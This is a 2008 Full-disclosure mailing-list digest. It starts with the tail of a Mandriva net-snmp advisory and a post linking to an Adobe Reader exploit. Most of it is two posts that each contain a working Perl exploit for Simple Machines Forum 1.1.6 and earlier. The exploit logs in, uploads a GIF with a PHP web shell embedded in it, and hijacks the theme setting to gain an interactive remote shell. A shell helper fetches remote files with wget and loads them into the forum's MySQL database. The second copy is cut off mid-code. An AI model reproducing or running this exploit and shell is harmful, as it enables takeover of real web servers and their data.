 1f73d4a19a2a0a159cdf4d1058ce17f2  2008.1/SRPMS/net-snmp-5.4.1-5.2mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 c4ddb52926754e188afa827365a9402d  2008.1/x86_64/lib64net-snmp15-5.4.1-5.2mdv2008.1.x86_64.rpm
 b71406ffbf1fddbe11d4e23636015043  2008.1/x86_64/lib64net-snmp-devel-5.4.1-5.2mdv2008.1.x86_64.rpm
 fbed296540545616ff8f248b32e7edf2  2008.1/x86_64/lib64net-snmp-static-devel-5.4.1-5.2mdv2008.1.x86_64.rpm
 7e4f56fe2433fd5a80b3ec09ca801755  2008.1/x86_64/net-snmp-5.4.1-5.2mdv2008.1.x86_64.rpm
 6275046a91fd1aea967f893720348f88  2008.1/x86_64/net-snmp-mibs-5.4.1-5.2mdv2008.1.x86_64.rpm
 c05711a0a2a0b69652c6d19e3c883e01  2008.1/x86_64/net-snmp-tkmib-5.4.1-5.2mdv2008.1.x86_64.rpm
 012b8391c5c49432d270d247e39fa64a  2008.1/x86_64/net-snmp-trapd-5.4.1-5.2mdv2008.1.x86_64.rpm
 d05bc5b73d566e16b76517fdd90f968d  2008.1/x86_64/net-snmp-utils-5.4.1-5.2mdv2008.1.x86_64.rpm
 d37bc36bd7a861f71fce000319904387  2008.1/x86_64/perl-NetSNMP-5.4.1-5.2mdv2008.1.x86_64.rpm 
 1f73d4a19a2a0a159cdf4d1058ce17f2  2008.1/SRPMS/net-snmp-5.4.1-5.2mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 67a289261b50a6ec4bbb74503ff15860  2009.0/i586/libnet-snmp15-5.4.2-2.1mdv2009.0.i586.rpm
 c0b057998d757e7988cac2276cc16d6a  2009.0/i586/libnet-snmp-devel-5.4.2-2.1mdv2009.0.i586.rpm
 340271a223791169762e826744d1aab3  2009.0/i586/libnet-snmp-static-devel-5.4.2-2.1mdv2009.0.i586.rpm
 4dad88af5b12b6001adc135e54a5f94c  2009.0/i586/net-snmp-5.4.2-2.1mdv2009.0.i586.rpm
 41cc69981bd2dd2886f764f46a19c326  2009.0/i586/net-snmp-mibs-5.4.2-2.1mdv2009.0.i586.rpm
 84ebcf44ee0d90e956d138ecafe7a9e0  2009.0/i586/net-snmp-tkmib-5.4.2-2.1mdv2009.0.i586.rpm
 d9ff03f1bb268735f27d4e70e441675a  2009.0/i586/net-snmp-trapd-5.4.2-2.1mdv2009.0.i586.rpm
 7d4891eb14e73c8f53cd7bee93dcab4b  2009.0/i586/net-snmp-utils-5.4.2-2.1mdv2009.0.i586.rpm
 66d9db711d7064d6326c50414ffe945b  2009.0/i586/perl-NetSNMP-5.4.2-2.1mdv2009.0.i586.rpm 
 142a9d0f6b5b895e50c93f66dd112459  2009.0/SRPMS/net-snmp-5.4.2-2.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 d9b76860696183041c5431b28c133d79  2009.0/x86_64/lib64net-snmp15-5.4.2-2.1mdv2009.0.x86_64.rpm
 3868b49eec570997ec1bce4603fdb5b1  2009.0/x86_64/lib64net-snmp-devel-5.4.2-2.1mdv2009.0.x86_64.rpm
 fde92f379f3e6f5d8e3cd307e0d3866d  2009.0/x86_64/lib64net-snmp-static-devel-5.4.2-2.1mdv2009.0.x86_64.rpm
 1265e20f1d23728a740ce3e23f6df279  2009.0/x86_64/net-snmp-5.4.2-2.1mdv2009.0.x86_64.rpm
 e799c8dbd928539d2993f3a4268cf4fc  2009.0/x86_64/net-snmp-mibs-5.4.2-2.1mdv2009.0.x86_64.rpm
 f34b37e106fe535c6262c0a20824cb71  2009.0/x86_64/net-snmp-tkmib-5.4.2-2.1mdv2009.0.x86_64.rpm
 dc838be5485af308d3f560dd3dd23845  2009.0/x86_64/net-snmp-trapd-5.4.2-2.1mdv2009.0.x86_64.rpm
 66be00a8327d9e0b9fcd4fb22829fd85  2009.0/x86_64/net-snmp-utils-5.4.2-2.1mdv2009.0.x86_64.rpm
 b22b8c100f8b74be46f87cd9e33bdee3  2009.0/x86_64/perl-NetSNMP-5.4.2-2.1mdv2009.0.x86_64.rpm 
 142a9d0f6b5b895e50c93f66dd112459  2009.0/SRPMS/net-snmp-5.4.2-2.1mdv2009.0.src.rpm

 Corporate 4.0:
 e830fee5189a6d99235f8b5465cf1cf8  corporate/4.0/i586/libnet-snmp5-5.2.1.2-5.3.20060mlcs4.i586.rpm
 a2b4e29f175d2f9cc0ad8709edbbbd87  corporate/4.0/i586/libnet-snmp5-devel-5.2.1.2-5.3.20060mlcs4.i586.rpm
 741b5e8a9a8ecaf6f4a2d4849e45bd2f  corporate/4.0/i586/libnet-snmp5-static-devel-5.2.1.2-5.3.20060mlcs4.i586.rpm
 94da62fa6bdc660c23e308111f73665e  corporate/4.0/i586/net-snmp-5.2.1.2-5.3.20060mlcs4.i586.rpm
 373a8f3e0bffea791d866c35dab6f2fa  corporate/4.0/i586/net-snmp-mibs-5.2.1.2-5.3.20060mlcs4.i586.rpm
 002e256aa1c2b0179894f0df8e10e70e  corporate/4.0/i586/net-snmp-trapd-5.2.1.2-5.3.20060mlcs4.i586.rpm
 23ccf736576e9002e84c09db16953ee6  corporate/4.0/i586/net-snmp-utils-5.2.1.2-5.3.20060mlcs4.i586.rpm
 13dc4a180a0be9c5afe36168278ffdf3  corporate/4.0/i586/perl-NetSNMP-5.2.1.2-5.3.20060mlcs4.i586.rpm 
 d9cfd05c0de2b6891761627579ccc1d8  corporate/4.0/SRPMS/net-snmp-5.2.1.2-5.3.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 7095df865e54764c051f10040b4de25d  corporate/4.0/x86_64/lib64net-snmp5-5.2.1.2-5.3.20060mlcs4.x86_64.rpm
 96a8dbf8ec18e76e4fddf52b2d19b93d  corporate/4.0/x86_64/lib64net-snmp5-devel-5.2.1.2-5.3.20060mlcs4.x86_64.rpm
 9af9807629580025cc1cdaba78826153  corporate/4.0/x86_64/lib64net-snmp5-static-devel-5.2.1.2-5.3.20060mlcs4.x86_64.rpm
 91d6d06059463804ae085bf42a702132  corporate/4.0/x86_64/net-snmp-5.2.1.2-5.3.20060mlcs4.x86_64.rpm
 47e44f0f67b04eae0c63ab9fc6636f10  corporate/4.0/x86_64/net-snmp-mibs-5.2.1.2-5.3.20060mlcs4.x86_64.rpm
 478577d14048824ef556371e43892f0e  corporate/4.0/x86_64/net-snmp-trapd-5.2.1.2-5.3.20060mlcs4.x86_64.rpm
 2766c681f5366ac9e9bfa74ff7388bd5  corporate/4.0/x86_64/net-snmp-utils-5.2.1.2-5.3.20060mlcs4.x86_64.rpm
 4ea12420b159bcecc5d7b2cef2bdeb8b  corporate/4.0/x86_64/perl-NetSNMP-5.2.1.2-5.3.20060mlcs4.x86_64.rpm 
 d9cfd05c0de2b6891761627579ccc1d8  corporate/4.0/SRPMS/net-snmp-5.2.1.2-5.3.20060mlcs4.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJEdTsmqjQ0CJFipgRAk0yAJ91M1kRkgQqJovhGgIaofqwrLlWQgCglLwu
8ZyyTGYX15oaOsh4j4Mq4AU=
=qPXg
-----END PGP SIGNATURE-----



From debasis.mohanty.listmails at gmail.com  Wed Nov  5 23:27:09 2008
From: debasis.mohanty.listmails at gmail.com (Debasis Mohanty)
Date: Thu, 6 Nov 2008 04:57:09 +0530
Subject: [Full-disclosure] Adobe Reader Javascript Printf Buffer Overflow
	[ZeroDay] Exploit
Message-ID: <49122bd1.09876e0a.6400.ffffbee6@mx.google.com>

Since past few weeks I was busy forking adobe stuffs, it didn't took me more
than few hours to come up with this exploit. Thanks to coresecurity folks
for their technical details which made my job easy. 

Grab it here... 
http://hackingspirits.com/vuln-rnd/vuln-rnd.html


-d 

www.coffeeandsecurity.com
www.hackingspirits.com



From elmysterio at hushmail.com  Thu Nov  6 03:55:57 2008
From: elmysterio at hushmail.com (elmysterio at hushmail.com)
Date: Wed, 05 Nov 2008 22:55:57 -0500
Subject: [Full-disclosure] No subject
Message-ID: <20081106035557.B21D82803B@smtp.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ANOTHER SMF Code Execution 0day!?  Good Lord...


#!/usr/bin/perl
#
# @title: Simple Machines Forum Code Execution
# @versn: * <= 1.1.6
# @authr: ~elmysterio ( a.k.a us )
# @stats: DROPPED!!!!!!!
# @descp: In loving memory of the rare bone marrow disease that
killed rgod.
#         We can't thank you enough for killing a bug killer.
# @bug  : Sources/QueryString.php  & Sources/Themes.php w/
magic_quotes == Off
# @gr33t: m0rt's failure,  it never stops.
#
# C:\Documents and Settings\molest>perl
P:\advisories\smf\smf_localfileinclude.pl
# -s http://localhost/audit/smf116 -u regular -p test -d
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
# [ii] User Id = 2
# [ii] Uploaded a shell...
# [cmd at win32]$ ver
#
# Microsoft Windows XP [Version 5.1.2600]
#
# [cmd at win32]$
#
#  FOR LULZ PURPOSE ONLY!!
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);

print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";

my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla
FireFox" );
my %parms = (	s => "",
        		d => 0,
        		x => sub { print "[**] Proxy found, using $_[1]\n"; $ua-
>proxy(['http'], $_[1]); },
        		u => "Gl0ria!!!",
        		p => "gl0ria\@herb3st" );

GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s";

if( !$parms{s} ) {
		die <<HELP
[ii] usage: $0 <parms>
	[-s]    Site        -> http://site.com/forums
	[-x]	Proxy       -> localhost:8118
	[-u]	Username    -> Gl0ria!!!
	[-p]    Password    -> gl0ria\@herb3st
	[-d]    Debug
HELP
}

my $shell =
chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
			chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
			chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00).
			chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
			chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
			chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00); $shell .= <<'EXIF';
<?php
 error_reporting(0);ini_set('max_execution_time',0);
 $x=trim(stripslashes($_SERVER[HTTP_SERVER_INFO]));$z=(ini_get('safe
_mode') or strpos(ini_get('disable_functions'),'passthru') ? '1' :
'0');
 if($x=='0998'){print '---info---'.PHP_OS.';'.$z.'---info---';exit;}
 print '---1243---';if($z){print eval($x);}else{print
passthru($x);}print '---3421---';exit;
?>
EXIF
			$shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
			chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
			chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
			chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
			chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
			chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
			chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
			chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
			chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
			chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
			chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
			chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
			chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
			chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
			chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
			chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
			chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
			chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
			chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
			chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
			chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
			chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
			chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
			chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
			chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
			chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
			chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
			chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
			chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
			chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
			chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
			chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
			chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
			chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
			chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
			chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
			chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
			chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
			chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
			chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
			chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
			chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
			chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
			chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
			chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
			chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
			chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
			chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
			chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
			chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
			chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
			chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
			chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
			chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
			chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
			chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
			chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
			chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
			chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
			chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
			chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
			chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
			chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
			chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
			chr(0x04).chr(0x00).chr(0x3b).chr(0x00);

## Logging in
my $ret = $ua->post("$parms{s}/index.php?action=login2",
		[
			user			=> $parms{u},
			passwrd			=> $parms{p},
			cookielength	=> -1
		]);

## Getting id, sid and checking to see if we're logged on
$ret = $ua->get("$parms{s}/index.php?action=profile");

die "[!!] Wrong username/password\n"
	unless $ret->as_string !~ /The user whose profile you are trying
to view does not exist/;

die "[!!] Error getting session id\n"
	unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;

die "[!!] Error getting id\n"
	unless my($id) = $ret->as_string =~ /u=(\d+);/;

print "[ii] Session ID = $sid\n".
      "[ii] User Id = $id\n" if $parms{d};

## Checking for shell
$ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => "echo expl0ited");

&shell
	if $ret->as_string =~ /expl0ited/;

$ret = $ua->request(
		POST "$parms{s}/index.php?action=profile2",
		Content_Type	=> 'multipart/form-data',
		Content			=>
		[
			avatar_choice	=> "upload",
			sc				=> $sid,
			userID			=> $id,
			sa				=> "forumProfile",
			attachment		=>
			[
				undef,
				"expl0ited.gif",
				Content         => $shell,
				"Content-Type"	=> "image/gif"
			]
		]);

## Updating Settings.php
$ret = $ua-
>get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=them
e_dir;val=./attachments/avatar_${id}.gif\%2500");

print "[ii] Uploaded a shell...\n"
    if $parms{d};

shell();

## lulz @ this shit.
sub shell {
	my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
    $ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => '0998' );
    ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---
/s;

	die "[!!] magic_quotes is turned on\n"
		if (not defined $os or not defined $sh or $1 eq $id);

    $sh = $sh ? "php" : "cmd";
    $os = $os =~ /win/i ? "win32" : "unix";

    do {
		print "[$sh\@$os]\$ ";
		$cmd = chomp (my $cmd = <STDIN>);


		exit
			unless $cmd !~ /^exit$/i;

        if( ($file) = $cmd =~ /^savefile (.*?) / ) {
            $cmd =~ s/savefile $1 //;
        } else { undef $file; }

        if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?)
(.*?)$/ ) {
            ($base) = $full =~ /\/(.*?)$/;
            $cmd = "cd attachments;wget $full; mysql --user=$user --
password=$pass < $base; rm $base;";
        }

        $ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => $cmd);
        $ret->as_string =~ /---1243---(.*?)---3421---/s;
        print "$1\n";

        if( defined $file ) {
            open FILE, ">>", $file or die "[!!] Error writing to
file; $!\n";
            print FILE "Command Executed: $cmd\n".
                       "Host: $parms{s}\n$1\n";
            close FILE;
        }
	} while( $cmd !~ /^exit$/i );

	exit;
}
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkkSas0ACgkQxKkly4PzmN5NMgP9HfdmqQqLoxVm8CgY2u+WmWt4m0NT
9y+p5GZrI9J8BTzskbrqtYi3eVczGJZXsxySxFNkwsxNEfqTEw/9g6a8+aR31ZvfdtCl
0Zba95awFpui1NldrmbYHlzQBRcZKgOzSJ/NbNyXZKFoEbNpAyzOeiJ687DigtI3999L
8+iF4bw=
=Ekcf
-----END PGP SIGNATURE-----

--
Click here to find the perfect picture with our powerful photo search features.
http://tagline.hushmail.com/fc/Ioyw6h4dI2gCEoclQGTkjUXYGk41vNKRZuqN4Oi1onWCayRT5ntSSM/



From elmysterio at hushmail.com  Thu Nov  6 03:57:19 2008
From: elmysterio at hushmail.com (elmysterio at hushmail.com)
Date: Wed, 05 Nov 2008 22:57:19 -0500
Subject: [Full-disclosure] [0day] Simple Machines Forum * <= 1.1.6 Code
	Execution
Message-ID: <20081106035719.837932803B@smtp.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

#!/usr/bin/perl
#
# @title: Simple Machines Forum Code Execution
# @versn: * <= 1.1.6
# @authr: ~elmysterio ( a.k.a us )
# @stats: DROPPED!!!!!!!
# @descp: In loving memory of the rare bone marrow disease that
killed rgod.
#         We can't thank you enough for killing a bug killer.
# @bug  : Sources/QueryString.php  & Sources/Themes.php w/
magic_quotes == Off
# @gr33t: m0rt's failure,  it never stops.
#
# C:\Documents and Settings\molest>perl
P:\advisories\smf\smf_localfileinclude.pl
# -s http://localhost/audit/smf116 -u regular -p test -d
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
# [ii] User Id = 2
# [ii] Uploaded a shell...
# [cmd at win32]$ ver
#
# Microsoft Windows XP [Version 5.1.2600]
#
# [cmd at win32]$
#
#  FOR LULZ PURPOSE ONLY!!
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);

print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";

my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla
FireFox" );
my %parms = (	s => "",
        		d => 0,
        		x => sub { print "[**] Proxy found, using $_[1]\n"; $ua-
>proxy(['http'], $_[1]); },
        		u => "Gl0ria!!!",
        		p => "gl0ria\@herb3st" );

GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s";

if( !$parms{s} ) {
		die <<HELP
[ii] usage: $0 <parms>
	[-s]    Site        -> http://site.com/forums
	[-x]	Proxy       -> localhost:8118
	[-u]	Username    -> Gl0ria!!!
	[-p]    Password    -> gl0ria\@herb3st
	[-d]    Debug
HELP
}

my $shell =
chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
			chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
			chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00).
			chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
			chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
			chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00); $shell .= <<'EXIF';
<?php
 error_reporting(0);ini_set('max_execution_time',0);
 $x=trim(stripslashes($_SERVER[HTTP_SERVER_INFO]));$z=(ini_get('safe
_mode') or strpos(ini_get('disable_functions'),'passthru') ? '1' :
'0');
 if($x=='0998'){print '---info---'.PHP_OS.';'.$z.'---info---';exit;}
 print '---1243---';if($z){print eval($x);}else{print
passthru($x);}print '---3421---';exit;
?>
EXIF
			$shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
